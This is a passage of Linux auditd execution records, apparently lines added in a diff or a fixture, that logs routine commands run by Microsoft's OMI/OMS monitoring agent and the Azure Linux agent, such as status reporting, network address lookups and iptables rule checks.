+type=EXECVE msg=audit(1551487501.446:889): argc=11 a0="/opt/omi/bin/omicli" a1="iv" a2="root/oms" a3="{" a4="MSFT_DSCLocalConfigurationManager" a5="}" a6="PerformRequiredConfigurationChecks" a7="{" a8="Flags" a9="1" a10="}"
+type=CWD msg=audit(1551487501.446:889): cwd="/var/opt/microsoft/omsagent/335208fd-8b1d-4dca-a69b-67608d94de5c/run"
+type=PATH msg=audit(1551487501.446:889): item=0 name="/opt/omi/bin/omicli" inode=258212 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.446:889): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.446:889): proctitle=2F6F70742F6F6D692F62696E2F6F6D69636C6900697600726F6F742F6F6D73007B004D5346545F4453434C6F63616C436F6E66696775726174696F6E4D616E61676572007D00506572666F726D5265717569726564436F6E66696775726174696F6E436865636B73007B00466C6167730031007D
+type=SYSCALL msg=audit(1551487501.450:890): arch=c000003e syscall=59 success=yes exit=0 a0=7fff5e222980 a1=7fff5e220830 a2=7fff5e224f98 a3=1 items=2 ppid=18274 pid=19301 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="omiagent" exe="/opt/omi/bin/omiagent" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.450:890): argc=9 a0="/opt/omi/bin/omiagent" a1="9" a2="10" a3="--destdir" a4="/" a5="--providerdir" a6="/opt/omi/lib" a7="--loglevel" a8="WARNING"
+type=CWD msg=audit(1551487501.450:890): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.450:890): item=0 name="/opt/omi/bin/omiagent" inode=258215 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.450:890): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.450:890): proctitle=2F6F70742F6F6D692F62696E2F6F6D696167656E740039003130002D2D64657374646972002F002D2D70726F7669646572646972002F6F70742F6F6D692F6C6962002D2D6C6F676C6576656C005741524E494E47
+type=SYSCALL msg=audit(1551487501.462:891): arch=c000003e syscall=59 success=yes exit=0 a0=7fe96437be9a a1=7ffe8374a880 a2=7ffe8375ce28 a3=1 items=2 ppid=19301 pid=19302 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.462:891): argc=3 a0="sh" a1="-c" a2=636174202F70726F632F7379732F6B65726E656C2F72616E646F6D2F75756964207C2061776B20277B7072696E7420746F7570706572282430297D27207C207472202D6420220A22
+type=CWD msg=audit(1551487501.462:891): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.462:891): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.462:891): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.462:891): proctitle=7368002D6300636174202F70726F632F7379732F6B65726E656C2F72616E646F6D2F75756964207C2061776B20277B7072696E7420746F7570706572282430297D27207C207472202D6420220A22
+type=SYSCALL msg=audit(1551487501.462:892): arch=c000003e syscall=59 success=yes exit=0 a0=55c29ccec680 a1=55c29ccec620 a2=55c29ccec638 a3=55c29ccec010 items=2 ppid=19302 pid=19303 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="cat" exe="/bin/cat" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.462:892): argc=2 a0="cat" a1="/proc/sys/kernel/random/uuid"
+type=SYSCALL msg=audit(1551487501.462:893): arch=c000003e syscall=59 success=yes exit=0 a0=55c29ccec6a8 a1=55c29ccec648 a2=55c29ccec660 a3=55c29ccec010 items=2 ppid=19302 pid=19304 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="awk" exe="/usr/bin/gawk" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.462:893): argc=2 a0="awk" a1=7B7072696E7420746F7570706572282430297D
+type=CWD msg=audit(1551487501.462:893): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.462:893): item=0 name="/usr/bin/awk" inode=4461 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.462:893): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.462:893): proctitle=61776B007B7072696E7420746F7570706572282430297D
+type=CWD msg=audit(1551487501.462:892): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.462:892): item=0 name="/bin/cat" inode=14 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.462:892): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.462:892): proctitle=636174002F70726F632F7379732F6B65726E656C2F72616E646F6D2F75756964
+type=SYSCALL msg=audit(1551487501.466:894): arch=c000003e syscall=59 success=yes exit=0 a0=55c29ccec6e8 a1=55c29ccec680 a2=55c29ccec6a0 a3=55c29ccec010 items=2 ppid=19302 pid=19305 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="tr" exe="/usr/bin/tr" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.466:894): argc=3 a0="tr" a1="-d" a2=0A
+type=CWD msg=audit(1551487501.466:894): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.466:894): item=0 name="/usr/bin/tr" inode=4210 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.466:894): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.466:894): proctitle=7472002D64
+type=SYSCALL msg=audit(1551487501.474:895): arch=c000003e syscall=59 success=yes exit=0 a0=7fe96437be9a a1=7fe95d518820 a2=7ffe8375ce28 a3=1 items=2 ppid=19301 pid=19310 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.474:895): argc=3 a0="sh" a1="-c" a2=2F6F70742F6D6963726F736F66742F6F6D73636F6E6669672F536372697074732F5374617475735265706F72742E73682037424533363146352D423035342D343436412D413233382D31323441454343413238343920537461727454696D65
+type=CWD msg=audit(1551487501.474:895): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.474:895): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.474:895): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.474:895): proctitle=7368002D63002F6F70742F6D6963726F736F66742F6F6D73636F6E6669672F536372697074732F5374617475735265706F72742E73682037424533363146352D423035342D343436412D413233382D31323441454343413238343920537461727454696D65
+type=SYSCALL msg=audit(1551487501.474:896): arch=c000003e syscall=59 success=yes exit=0 a0=55cf1a8a1b98 a1=55cf1a8a1c40 a2=55cf1b3c5578 a3=55cf1b3c5010 items=3 ppid=19310 pid=19311 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="StatusReport.sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.474:896): argc=4 a0="/bin/sh" a1="/opt/microsoft/omsconfig/Scripts/StatusReport.sh" a2="7BE361F5-B054-446A-A238-124AECCA2849" a3="StartTime"
+type=CWD msg=audit(1551487501.474:896): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.474:896): item=0 name="/opt/microsoft/omsconfig/Scripts/StatusReport.sh" inode=266438 dev=08:01 mode=0100755 ouid=998 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.474:896): item=1 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.474:896): item=2 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.474:896): proctitle=2F62696E2F7368002F6F70742F6D6963726F736F66742F6F6D73636F6E6669672F536372697074732F5374617475735265706F72742E73680037424533363146352D423035342D343436412D413233382D31323441454343413238343900537461727454696D65
+type=SYSCALL msg=audit(1551487501.474:897): arch=c000003e syscall=59 success=yes exit=0 a0=55d94181ec60 a1=55d94181ec00 a2=55d94181ec18 a3=55d9432ca010 items=2 ppid=19311 pid=19312 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="date" exe="/bin/date" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.474:897): argc=2 a0="date" a1="+%Y-%m-%dT%T.%N%:z"
+type=CWD msg=audit(1551487501.474:897): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.474:897): item=0 name="/bin/date" inode=19 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.474:897): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.474:897): proctitle=64617465002B25592D256D2D25645425542E254E253A7A
+type=SYSCALL msg=audit(1551487501.478:898): arch=c000003e syscall=59 success=yes exit=0 a0=55d9432cbae0 a1=55d9432cba80 a2=55d9432cba98 a3=55d9432ca010 items=2 ppid=19313 pid=19314 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="ip" exe="/bin/ip" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.478:898): argc=2 a0="ip" a1="addr"
+type=CWD msg=audit(1551487501.478:898): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.478:898): item=0 name="/sbin/ip" inode=115 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.478:898): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.478:898): proctitle=69700061646472
+type=SYSCALL msg=audit(1551487501.478:899): arch=c000003e syscall=59 success=yes exit=0 a0=55d9432cbb00 a1=55d9432cba98 a2=55d9432cbab8 a3=55d9432ca010 items=2 ppid=19313 pid=19319 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="cut" exe="/usr/bin/cut" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.478:899): argc=3 a0="cut" a1="-c" a2="1-254"
+type=CWD msg=audit(1551487501.478:899): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.478:899): item=0 name="/usr/bin/cut" inode=4154 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.478:899): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.478:899): proctitle=637574002D6300312D323534
+type=SYSCALL msg=audit(1551487501.478:900): arch=c000003e syscall=59 success=yes exit=0 a0=55d9432cbb00 a1=55d9432cba98 a2=55d9432cbab8 a3=55d9432ca010 items=2 ppid=19313 pid=19318 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="tr" exe="/usr/bin/tr" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.478:900): argc=3 a0="tr" a1="\n" a2=";"
+type=CWD msg=audit(1551487501.478:900): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.478:900): item=0 name="/usr/bin/tr" inode=4210 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.478:900): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.478:900): proctitle=7472005C6E003B
+type=SYSCALL msg=audit(1551487501.478:901): arch=c000003e syscall=59 success=yes exit=0 a0=55d9432cbb10 a1=55d9432cbab0 a2=55d9432cbac8 a3=0 items=2 ppid=19313 pid=19317 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="sed" exe="/bin/sed" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.478:901): argc=2 a0="sed" a1="s/\/.*//"
+type=CWD msg=audit(1551487501.478:901): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.478:901): item=0 name="/bin/sed" inode=70 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.478:901): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.478:901): proctitle=73656400732F5C2F2E2A2F2F
+type=SYSCALL msg=audit(1551487501.478:902): arch=c000003e syscall=59 success=yes exit=0 a0=55d9432cbae0 a1=55d9432cba80 a2=55d9432cba98 a3=55d9432ca010 items=2 ppid=19313 pid=19315 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="grep" exe="/bin/grep" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.478:902): argc=2 a0="grep" a1="inet"
+type=CWD msg=audit(1551487501.478:902): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.478:902): item=0 name="/bin/grep" inode=51 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.478:902): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.478:902): proctitle=6772657000696E6574
+type=SYSCALL msg=audit(1551487501.482:903): arch=c000003e syscall=59 success=yes exit=0 a0=55d9432cbae8 a1=55d9432cba88 a2=55d9432cbaa0 a3=55d9432ca010 items=2 ppid=19313 pid=19316 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="awk" exe="/usr/bin/gawk" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.482:903): argc=2 a0="awk" a1=7B7072696E742024327D
+type=CWD msg=audit(1551487501.482:903): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.482:903): item=0 name="/usr/bin/awk" inode=4461 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.482:903): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.482:903): proctitle=61776B007B7072696E742024327D
+type=SYSCALL msg=audit(1551487501.482:904): arch=c000003e syscall=59 success=yes exit=0 a0=55d9432cbac8 a1=55d9432cba70 a2=55d9432cba80 a3=55d9432ca010 items=2 ppid=19311 pid=19320 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="hostname" exe="/bin/hostname" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.482:904): argc=1 a0="hostname"
+type=CWD msg=audit(1551487501.482:904): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487501.482:904): item=0 name="/bin/hostname" inode=65 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.482:904): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.482:904): proctitle="hostname"
+type=SYSCALL msg=audit(1551487505.094:905): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0685e210 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19322 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487505.094:905): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487505.094:905): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487505.094:905): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487505.094:905): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487505.094:905): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487505.094:906): arch=c000003e syscall=59 success=yes exit=0 a0=5598e857cbb8 a1=5598e857cb70 a2=5598e857cb88 a3=7fd6df448810 items=2 ppid=19322 pid=19323 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487505.094:906): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487505.094:906): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487505.094:906): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487505.094:906): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487505.094:906): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487505.094:907): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0685e210 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19324 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487505.094:907): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487505.094:907): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487505.094:907): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487505.094:907): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487505.094:907): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487505.098:908): arch=c000003e syscall=59 success=yes exit=0 a0=558e562fe7e0 a1=558e562fe728 a2=558e562fe7b0 a3=7f671181d810 items=2 ppid=19324 pid=19325 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487505.098:908): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487505.098:908): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487505.098:908): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487505.098:908): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487505.098:908): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487510.106:909): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0685e470 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19326 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487510.106:909): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487510.106:909): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487510.106:909): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487510.106:909): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487510.106:909): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487510.106:910): arch=c000003e syscall=59 success=yes exit=0 a0=563fb79a6bb8 a1=563fb79a6b70 a2=563fb79a6b88 a3=7f8ccf147810 items=2 ppid=19326 pid=19327 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487510.106:910): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487510.106:910): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487510.106:910): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487510.106:910): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487510.106:910): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487510.110:911): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0685e470 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19328 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487510.110:911): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487510.110:911): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487510.110:911): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
